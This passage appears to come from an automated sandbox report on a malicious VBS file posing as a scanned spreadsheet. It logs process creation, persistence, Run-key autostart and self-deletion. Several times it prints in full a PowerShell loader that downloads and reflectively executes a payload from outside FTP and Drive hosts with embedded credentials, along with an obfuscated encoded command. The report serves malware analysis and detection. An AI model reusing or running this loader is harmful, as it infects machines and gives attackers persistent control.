'\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$mjdqf.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $mjdqf.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mjdqf.dispose();$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mjdqf.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.db/ssc/ezimotsuc/sedulcni-pw/moc.srekeesedutitarg.www//:sptth' , $huUPX , 'D DD' ) );};"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'EQ' + [char]65 + 'R' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'EQ' + [char]65 + 'Jw' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + 'BY' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'VQB1' + [char]65 + 'Gg' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Gg' + [char]65 + 'd' + [char]65 + 'B0' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'cw' + [char]65 + '6' + [char]65 + 'C8' + [char]65 + 'LwB3' + [char]65 + 'Hc' + [char]65 + 'dw' + [char]65 + 'u' + [char]65 + 'Gc' + [char]65 + 'cgBh' + [char]65 + 'HQ' + [char]65 + 'aQB0' + [char]65 + 'HU' + [char]65 + 'Z' + [char]65 + 'Bl' + [char]65 + 'HM' + [char]65 + 'ZQBl' + [char]65 + 'Gs' + [char]65 + 'ZQBy' + [char]65 + 'HM' + [char]65 + 'LgBj' + [char]65 + 'G8' + [char]65 + 'bQ' + [char]65 + 'v' + [char]65 + 'Hc' + [char]65 + 'c' + [char]65 + '' + [char]65 + 't' + [char]65 + 'Gk' + [char]65 + 'bgBj' + [char]65 + 'Gw' + [char]65 + 'dQBk' + [char]65 + 'GU' + [char]65 + 'cw' + [char]65 + 'v' + [char]65 + 'GM' + [char]65 + 'dQBz' + [char]65 + 'HQ' + [char]65 + 'bwBt' + [char]65 + 'Gk' + [char]65 + 'egBl' + [char]65 + 'C8' + [char]65 + 'YwBz' + [char]65 + 'HM' + [char]65 + 'LwBi' + [char]65 + 'GQ' + [char]65 + 'LgB0' + [char]65 + 'Hg' + [char]65 + 'd' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'F0' + [char]65 + 'XQBb' + [char]65 + 'HQ' + [char]65 + 'YwBl' + [char]65 + 'Go' + [char]65 + 'YgBv' + [char]65 + 'Fs' + [char]65 + 'I' + [char]65 + '' + [char]65 + 's' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'b' + [char]65 + 'Bs' + [char]65 + 'HU' + [char]65 + 'bg' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bl' + [char]65 + 'Gs' + [char]65 + 'bwB2' + [char]65 + 'G4' + [char]65 + 'SQ' + [char]65 + 'u' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Ek' + [char]65 + 'VgBG' + [char]65 + 'HI' + [char]65 + 'c' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bk' + [char]65 + 'G8' + [char]65 + 'a' + [char]65 + 'B0' + [char]65 + 'GU' + [char]65 + 'TQB0' + [char]65 + 'GU' + [char]65 + 'Rw' + [char]65 + 'u' + [char]65 + 'Ck' + [char]65 + 'Jw' + [char]65 + 'x' + [char]65 + 'HM' + [char]65 + 'cwBh' + [char]65 + 'Gw' + [char]65 + 'Qw' + [char]65 + 'u' + [char]65 + 'DM' + [char]65 + 'eQBy' + [char]65 + 'GE' + [char]65 + 'cgBi' + [char]65 + 'Gk' + [char]65 + 'T' + [char]65 + 'Bz' + [char]65 + 'HM' + [char]65 + 'YQBs' + [char]65 + 'EM' + [char]65 + 'Jw' + [char]65 + 'o' + [char]65 + 'GU' + [char]65 + 'c' + [char]65 + 'B5' + [char]65 + 'FQ' + [chJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yfepp = (New-Object Net.WebClient);$yfepp.Encoding = [System.Text.Encoding]::UTF8;$yfepp.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$mjdqf.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $mjdqf.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mjdqf.dispose();$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mjdqf.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.db/ssc/ezimotsuc/sedulcni-pw/moc.srekeesedutitarg.www//:sptth' , $huUPX , 'D DD' ) );};"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,20_2_0041CBE1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD347B0000 push esp; retf 4810h2_2_00007FFD347B01E3
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD347B708C push esi; retf 2_2_00007FFD347B71B7
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD345B00BD pushad ; iretd 4_2_00007FFD345B00C1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD345B0108 push ds; ret 4_2_00007FFD345B01B6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD345B0513 push eax; iretd 4_2_00007FFD345B053E
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD345B018D push ds; ret 4_2_00007FFD345B01B6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD345B05F5 push es; iretd 4_2_00007FFD345B061E
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD345B0347 push esi; ret 4_2_00007FFD345B0376
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD345B2358 push cs; ret 4_2_00007FFD345B2366
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD345B0327 pushad ; ret 4_2_00007FFD345B0346
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD345B06F0 push edi; ret 4_2_00007FFD345B070E
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD346823A3 push 8B485F94h; iretd 4_2_00007FFD346823AB
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD3468235D push 8B485F94h; retf 4_2_00007FFD34682365
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD3449D2A5 pushad ; iretd 5_2_00007FFD3449D2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD345B00BD pushad ; iretd 5_2_00007FFD345B00C1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD345B0108 push ds; ret 5_2_00007FFD345B01B6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD345B851B push ebx; ret 5_2_00007FFD345B85AA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD345B0513 push eax; iretd 5_2_00007FFD345B053E
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD345B84DD push ebx; ret 5_2_00007FFD345B851A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD345B84DD push ebx; ret 5_2_00007FFD345B85AA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD345B018D push ds; ret 5_2_00007FFD345B01B6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD345B0680 push ss; iretd 5_2_00007FFD345B071E
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD345B0347 push esi; ret 5_2_00007FFD345B0376
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD345B0327 pushad ; ret 5_2_00007FFD345B0346
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD345B06FF push ss; iretd 5_2_00007FFD345B071E
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD3448D2A5 pushad ; iretd 6_2_00007FFD3448D2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD345A5CFA push ebp; ret 6_2_00007FFD345A5D16
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD345A85DD push ebx; ret 6_2_00007FFD345A861A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD345AAB77 push esp; retf 6_2_00007FFD345AAB78
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD345A8433 push ebx; ret 6_2_00007FFD345A843A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD345B00BD pushad ; iretd 13_2_00007FFD345B00C1

                    Persistence and Installation Behavior

                    barindex
                    Tries to download and execute files (via powershell)
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yfepp = (New-Object Net.WebClient);$yfepp.Encoding = [System.Text.Encoding]::UTF8;$yfepp.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$mjdqf.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $mjdqf.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mjdqf.dispose();$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mjdqf.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.db/ssc/ezimotsuc/sedulcni-pw/moc.srekeesedutitarg.www//:sptth' , $huUPX , 'D DD' ) );};"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yfepp = (New-Object Net.WebClient);$yfepp.Encoding = [System.Text.Encoding]::UTF8;$yfepp.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$mjdqf.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $mjdqf.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mjdqf.dispose();$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mjdqf.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.db/ssc/ezimotsuc/sedulcni-pw/moc.srekeesedutitarg.www//:sptth' , $huUPX , 'D DD' ) );};"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00406EEB ShellExecuteW,URLDownloadToFileW,20_2_00406EEB

                    Boot Survival

                    barindex
                    Creates autostart registry keys with suspicious values (likely registry only malware)
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Update Drivers NVIDEO_vuw cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exitJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,20_2_0041AADB
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Update Drivers NVIDEO_vuwJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Update Drivers NVIDEO_vuwJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Self deletion via cmd or bat file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: cmd.exe /c del "C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: cmd.exe /c del "C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,20_2_0041CBE1
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
